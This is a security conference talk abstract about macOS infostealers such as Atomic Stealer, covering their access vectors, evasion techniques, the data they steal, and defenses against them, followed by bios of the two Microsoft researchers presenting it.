The Silent Invaders: Understanding and Combating macOS Infostealers
macOS infostealers have rapidly evolved into a major cybersecurity threat, with their prevalence doubling in the past year. These threats, often distributed as malware-as-a-service, are increasingly targeting macOS users across industries and geographies. The latest wave of infostealers particularly variants like Atomic Stealer which demonstrate enhanced stealth, persistence, and backdoor capabilities.
This paper investigates how macOS infostealers leverage emerging initial access vectors, including malvertising and the impersonation of trusted applications such as Slack, Homebrew, and more recently, ClickFix – a new method that further expands their reach and deception capabilities. Once inside, they leverage payload encryption, advanced obfuscation, and token regeneration to maintain access and exfiltrate sensitive data, including credentials, browser artifacts, and crypto wallets.
We will analyze infection chains, shared codebases, MITRE ATT&CK mappings, and the broader impact of these threats. The session will also highlight proactive defense strategies, including dynamic detection, user awareness, and endpoint hardening, to counter this growing menace.
Srinivasan Govindarajan – Microsoft
Srinivasan Govindarajan is a Senior Security Researcher at Microsoft India, specializing in macOS threat detection and malware analysis. With over 13 years of experience in the cybersecurity domain, he brings deep expertise in reverse engineering, stealthy payload detection, and advanced infostealer campaigns. His work focuses on uncovering sophisticated macOS threats and developing robust detection strategies.
Pranjal Gupta – Microsoft
Pranjal Gupta – Security Researcher 2 at Microsoft with 9 years of experience in the cybersecurity domain. Working in the MacOS security research team and has expertise in reverse engineering and malware analysis and security product development.